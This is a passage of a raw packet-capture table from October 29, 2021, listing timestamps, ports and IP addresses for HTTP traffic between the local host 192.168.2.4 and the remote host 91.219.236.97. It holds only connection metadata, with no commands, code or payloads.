Oct 29, 2021 20:51:14.150352955 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150427103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150444031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150473118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150482893 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150492907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150509119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150513887 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150527000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150543928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150559902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150566101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150578022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150593996 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150593996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150614023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150624990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150630951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150650024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150665998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150681973 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150696039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150727034 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150734901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150748014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150754929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150795937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150814056 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150825977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150841951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150877953 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150880098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150897980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150913954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150933027 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150943041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150959969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.150964022 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.150976896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151021004 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.151026964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151045084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151062012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151076078 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.151077032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151094913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151110888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.151113987 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.151148081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226106882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226131916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226145029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226156950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226172924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226190090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226205111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226222038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226238012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226248980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226260900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226273060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226284981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226284981 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226296902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226310015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226324081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226330042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226336002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226349115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226353884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226367950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226377010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226383924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226397991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226409912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226425886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226425886 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226434946 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226439953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226459026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226475000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226475000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226491928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226509094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226522923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226525068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226541996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226553917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226569891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226576090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226583004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226588011 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226594925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226600885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226618052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226630926 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226634026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226651907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226660967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226670980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226686954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226697922 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226702929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226720095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226727962 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226737022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226752996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226768017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226779938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226784945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226802111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226813078 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226818085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226824045 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226835012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226851940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226866961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226866961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226883888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226896048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226908922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226912022 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226926088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226942062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226954937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.226958036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226977110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226991892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.226990938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.227034092 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.260914087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261010885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261022091 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261038065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261064053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261080027 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261087894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261112928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261128902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261135101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261159897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261183977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261192083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261207104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261235952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261240959 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261261940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261275053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261286974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261308908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261323929 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261332989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261357069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261374950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261380911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261404991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261420012 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261428118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261451006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261466980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261475086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261501074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261513948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261524916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261547089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261568069 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261569023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261591911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261612892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261631966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261648893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261657953 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261670113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261689901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261693954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261709929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261730909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261739969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261760950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261775970 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261785984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261806011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261826038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261826992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261847973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261867046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.261868000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261893034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.261914015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262547970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262582064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262604952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262608051 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262629986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262645006 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262655020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262680054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262695074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262703896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262728930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262743950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262751102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262777090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262794018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262799978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262823105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262837887 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262845039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262867928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262883902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262890100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262913942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262928009 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262937069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262959957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.262975931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.262983084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263008118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263020992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.263031006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263053894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263071060 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.263077974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263103008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.263118029 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333148003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333182096 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333204031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333225012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333245993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333267927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333290100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333309889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333331108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333345890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333350897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333373070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333380938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333385944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333389044 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333395004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333416939 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333417892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333441019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333458900 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333463907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333484888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333506107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333508968 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333528042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333549023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333550930 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333570957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333591938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333595037 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333614111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333636999 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333636999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333658934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333673954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333681107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333703041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333719969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333722115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333744049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333760023 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333765030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333786011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333801985 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333808899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333830118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333852053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333853006 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333873034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333893061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333895922 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333914995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333930969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333935976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333959103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.333972931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.333980083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334001064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334019899 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334021091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334043980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334059000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334064007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334085941 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334105968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334126949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334126949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334147930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334148884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334167957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334188938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334208965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334228039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334232092 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334237099 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334248066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334263086 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334269047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334290028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334311008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334314108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334331036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334347963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334359884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334366083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334378004 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334389925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334412098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334431887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334435940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334453106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334467888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334474087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334495068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334517002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334518909 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.334537029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.334563971 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.371689081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.371777058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.371819019 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.371833086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.371884108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.371889114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.371942043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.371988058 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:14.371997118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:14.372055054 CEST	80	49865	91.219.236.97	192.168.2.4
